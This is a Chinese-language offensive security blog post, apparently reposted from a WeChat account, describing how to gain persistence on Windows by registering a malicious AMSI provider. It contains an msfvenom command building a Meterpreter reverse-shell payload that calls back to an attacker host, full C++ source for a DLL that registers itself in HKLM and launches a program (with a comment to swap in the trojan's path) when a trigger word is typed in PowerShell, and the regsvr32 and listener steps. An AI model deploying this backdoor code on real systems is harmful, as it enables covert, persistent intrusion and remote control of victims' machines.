AMSI持久化

admin 2022年2月24日23:38:29评论87 views字数 6393阅读21分18秒阅读模式

前言

AMSI(反恶意软件扫描接口)是一个的接口,可以与端点通信以防止执行恶意软件。端点执行的扫描是基于签名的,因此可以在执行任何脚本之前通过多种方法绕过。下面是通过修改注册表 使用AMSI来建立持久化后门。

持久化操作

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 -f exe > /home/test.exe

AMSI持久化

将生成的木马放入目标机

Microsoft提供了用于ASMI测试的代码。最初这种技术是由b4rtik发现,并在他的博客中发布了修改后的 Microsoft 代码。以下代码表示假的AMSI 提供程序,在执行触发器时将打开 calc.exe。(注:该方法请在管理员权限下的窗口执行)

下载链接: https://github.com/netbiosX/AMSI-Provider

如下操作

AMSI持久化

AMSI持久化

https://s2.loli.net/2022/02/11/LN2lyF1Qi6ht3ux.png

代码如下:

#include "stdafx.h"
#include <process.h>
#include <subauth.h>
#include <strsafe.h>
#include <amsi.h>
#include <windows.h>
#include <wrl/module.h>

using namespace Microsoft::WRL;

HMODULE g_currentModule;

typedef void (NTAPI* _RtlInitUnicodeString)(
PUNICODE_STRING DestinationString,
PCWSTR SourceString
)
;

typedef NTSYSAPI BOOLEAN(NTAPI* _RtlEqualUnicodeString)(
PUNICODE_STRING String1,
PUNICODE_STRING String2,
BOOLEAN CaseInsetive
)
;

DWORD WINAPI MyThreadFunction(LPVOID lpParam);
void ErrorHandler(LPTSTR lpszFunction);

BOOL APIENTRY DllMain(HMODULE module, DWORD reason, LPVOID reserved)
{
switch (reason)
{
case DLL_PROCESS_ATTACH:
g_currentModule = module;
DisableThreadLibraryCalls(module);
Module<InProc>::GetModule().Create();
break;

case DLL_PROCESS_DETACH:
Module<InProc>::GetModule().Terminate();
break;
}
return TRUE;
}

#pragma region COM server boilerplate
HRESULT WINAPI DllCanUnloadNow()
{
return Module<InProc>::GetModule().Terminate() ? S_OK : S_FALSE;
}

STDAPI DllGetClassObject(_In_ REFCLSID rclsid, _In_ REFIID riid, _Outptr_ LPVOID FAR* ppv)
{
return Module<InProc>::GetModule().GetClassObject(rclsid, riid, ppv);
}
#pragma endregion

class
DECLSPEC_UUID("2E5D8A62-77F9-4F7B-A90C-2744820139B2")
PentestlabAmsiProvider : public RuntimeClass<RuntimeClassFlags<ClassicCom>, IAntimalwareProvider, FtmBase>
{
public:
IFACEMETHOD(Scan)(_In_ IAmsiStream * stream, _Out_ AMSI_RESULT * result) override;
IFACEMETHOD_(void, CloseSession)(_In_ ULONGLONG session) override;
IFACEMETHOD(DisplayName)(_Outptr_ LPWSTR * displayName) override;

private:
LONG m_requestNumber = 0;
};


HRESULT PentestlabAmsiProvider::Scan(_In_ IAmsiStream* stream, _Out_ AMSI_RESULT* result)
{
_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString");
_RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEqualUnicodeString");

UNICODE_STRING myTriggerString1;
RtlInitUnicodeString(&myTriggerString1, L"pentestlab");

UNICODE_STRING myTriggerString2;
RtlInitUnicodeString(&myTriggerString2, L""pentestlab"");

UNICODE_STRING myTriggerString3;
RtlInitUnicodeString(&myTriggerString3, L"'pentestlab'");

ULONG actualSize;
ULONGLONG contentSize;
if (!SUCCEEDED(stream->GetAttribute(AMSI_ATTRIBUTE_CONTENT_SIZE, sizeof(ULONGLONG), reinterpret_cast<PBYTE>(&contentSize), &actualSize)) &&
actualSize == sizeof(ULONGLONG))
{
*result = AMSI_RESULT_NOT_DETECTED;

return S_OK;
}

PBYTE contentAddress;
if (!SUCCEEDED(stream->GetAttribute(AMSI_ATTRIBUTE_CONTENT_ADDRESS, sizeof(PBYTE), reinterpret_cast<PBYTE>(&contentAddress), &actualSize)) &&
actualSize == sizeof(PBYTE))
{
*result = AMSI_RESULT_NOT_DETECTED;

return S_OK;
}


if (contentAddress)
{
if (contentSize < 50)
{
UNICODE_STRING myuni;
myuni.Buffer = (PWSTR)contentAddress;
myuni.Length = (USHORT)contentSize;
myuni.MaximumLength = (USHORT)contentSize;

if (RtlEqualUnicodeString(&myTriggerString1, &myuni, TRUE) || RtlEqualUnicodeString(&myTriggerString2, &myuni, TRUE) || RtlEqualUnicodeString(&myTriggerString3, &myuni, TRUE))
{

DWORD thId;
CreateThread(NULL, 0, MyThreadFunction, NULL, 0, &thId);
}
}
}

*result = AMSI_RESULT_NOT_DETECTED;

return S_OK;
}

void PentestlabAmsiProvider::CloseSession(_In_ ULONGLONG session)
{

}

HRESULT PentestlabAmsiProvider::DisplayName(_Outptr_ LPWSTR* displayName)
{
*displayName = const_cast<LPWSTR>(L"Sample AMSI Provider");
return S_OK;
}

CoCreatableClass(PentestlabAmsiProvider);

DWORD WINAPI MyThreadFunction(LPVOID lpParam)
{
system("c:\Windows\System32\calc.exe"); //打开计算器 可将此处修改为木马路径

return 0;
}


#pragma region Install / uninstall

HRESULT SetKeyStringValue(_In_ HKEY key, _In_opt_ PCWSTR subkey, _In_opt_ PCWSTR valueName, _In_ PCWSTR stringValue)
{
LONG status = RegSetKeyValue(key, subkey, valueName, REG_SZ, stringValue, (wcslen(stringValue) + 1) * sizeof(wchar_t));
return HRESULT_FROM_WIN32(status);
}

STDAPI DllRegisterServer()
{
wchar_t modulePath[MAX_PATH];
if (GetModuleFileName(g_currentModule, modulePath, ARRAYSIZE(modulePath)) >= ARRAYSIZE(modulePath))
{
return E_UNEXPECTED;
}

wchar_t clsidString[40];
if (StringFromGUID2(__uuidof(PentestlabAmsiProvider), clsidString, ARRAYSIZE(clsidString)) == 0)
{
return E_UNEXPECTED;
}

wchar_t keyPath[200];
HRESULT hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\Classes\CLSID\%ls", clsidString);
if (FAILED(hr)) return hr;

hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, L"PentestlabAmsiProvider");
if (FAILED(hr)) return hr;

hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\Classes\CLSID\%ls\InProcServer32", clsidString);
if (FAILED(hr)) return hr;

hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, modulePath);
if (FAILED(hr)) return hr;

hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, L"ThreadingModel", L"Both");
if (FAILED(hr)) return hr;

// Register this CLSID as an anti-malware provider.
hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\Microsoft\AMSI\Providers\%ls", clsidString);
if (FAILED(hr)) return hr;

hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, L"PentestlabAmsiProvider");
if (FAILED(hr)) return hr;

return S_OK;
}

STDAPI DllUnregisterServer()
{
wchar_t clsidString[40];
if (StringFromGUID2(__uuidof(PentestlabAmsiProvider), clsidString, ARRAYSIZE(clsidString)) == 0)
{
return E_UNEXPECTED;
}

// Unregister this CLSID as an anti-malware provider.
wchar_t keyPath[200];
HRESULT hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\Microsoft\AMSI\Providers\%ls", clsidString);
if (FAILED(hr)) return hr;
LONG status = RegDeleteTree(HKEY_LOCAL_MACHINE, keyPath);
if (status != NO_ERROR && status != ERROR_PATH_NOT_FOUND) return HRESULT_FROM_WIN32(status);

// Unregister this CLSID as a COM server.
hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\Classes\CLSID\%ls", clsidString);
if (FAILED(hr)) return hr;
status = RegDeleteTree(HKEY_LOCAL_MACHINE, keyPath);
if (status != NO_ERROR && status != ERROR_PATH_NOT_FOUND) return HRESULT_FROM_WIN32(status);

return S_OK;
}
#pragma endregion

AMSI持久化

AMSI持久化

将上述代码编译为AmsiProvider.dll,将其放入目标机的C:WindowsSysWOW64目录下

使用 regsvr32 程序向系统注册 AMSI 提供程序

regsvr32 AmsiProvider.dll

AMSI持久化

上图显示成功

然后本机监听端口

AMSI持久化

然后在目标机普通权限的powershell上输入"pentestlab"

"pentestlab"

AMSI持久化

AMSI持久化

参考:https://b4rtik.github.io/posts/antimalware-scan-interface-provider-for-persistence/

关注及时推送最新安全威胁资讯!

AMSI持久化



干货 | CS绕过vultr特征检测修改算法


 | GitLab未授权RCE(CVE-2021-22205)


 | Apache APISIX Dashboard-RCE工具





好文分享收藏赞一下最美点在看哦

原文始发于微信公众号(渗透安全团队):AMSI持久化

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月24日23:38:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   AMSI持久化http://cn-sec.com/archives/801875.html

发表评论

匿名网友 填写信息